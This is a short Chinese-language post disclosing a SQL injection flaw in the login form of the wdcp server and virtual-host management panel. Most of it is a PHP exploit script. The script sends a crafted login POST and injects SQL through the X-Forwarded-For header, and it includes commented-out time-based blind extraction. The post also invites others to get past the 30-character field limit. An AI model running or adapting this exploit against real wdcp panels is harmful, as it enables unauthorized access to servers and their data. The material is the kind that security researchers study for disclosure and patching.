wdcp服务器/虚拟主机管理系统登陆框注入漏洞。
passwd字段存在注入风险,选择限制字符长度为30.我想应该有大牛能绕过!
漏洞利用脚本
<?php
$id=$_GET["id"];
//$id2=$_GET["id2"];
$post_data = 'username=admin&passwd=bbbbbb\&Submit_login=aaaassss';
$url='http://xxx:8080/';
$starttime = time();
$ch = curl_init();
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL,$url);
//curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR: ,('.$id.'),char(65),1) #'));
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
ob_start();
curl_exec($ch);
$result = ob_get_contents() ;
ob_end_clean();
$endtime = time();
/*
if($endtime-$starttime>=3){
exit($id." is ".chr($id2));
}*/
echo $result;
?>